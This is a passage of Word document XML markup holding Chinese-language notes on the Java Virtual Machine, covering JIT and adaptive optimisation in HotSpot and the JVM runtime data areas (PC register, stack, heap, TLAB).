          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JIT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>属于第二代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）自适应优化（目前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HotspotJVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>采用这种技术）则吸取第一代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>和第二代</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Fonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的经验，采用两者结合的方式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:firstLine="351"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>开始对所有的代码都采取解释执行的方式，并监视代码执行情况，然后对那些经常调用的方法启动一个后台线程，将其编译为本地代码，并进行优化。若方法不再频繁使用，则取消编译过的代码，仍对其进行解释执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="351"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="351"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>五、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>运行时数据区</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Style w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>第一块：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>寄存器</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Fonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>寄存器是用于存储每个线程下一步将执行的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>指令，如该方法为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>native</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的，则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>寄存器中不存储任何信息。</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Style w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>第二块：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>栈</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Fonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>栈是线程私有的，每个线程创建的同时都会创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>栈，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>栈中存放的为当前线程中局部基本类型的变量（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中定义的八种基本类型：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>short</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>float</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>double</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）、部分的返回结果以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stack Frame</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，非基本类型的对象在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>栈上仅存放一个指向堆上的地址</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Style w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>第三块：堆（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Heap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>它是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>用来存储对象实例以及数组值的区域，可以认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中所有通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>创建的对象的内存都在此分配，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Heap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中的对象的内存需要等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>进行回收。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="601"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（1）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>堆是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中所有线程共享的，因此在其上进行对象内存的分配均需要进行加锁，这也导致了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>对象的开销是比较大的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="601"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（2）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sun Hotspot JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>为了提升对象内存分配的效率，对于所创建的线程都会分配一块独立的空间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TLAB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Thread Local Allocation Buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
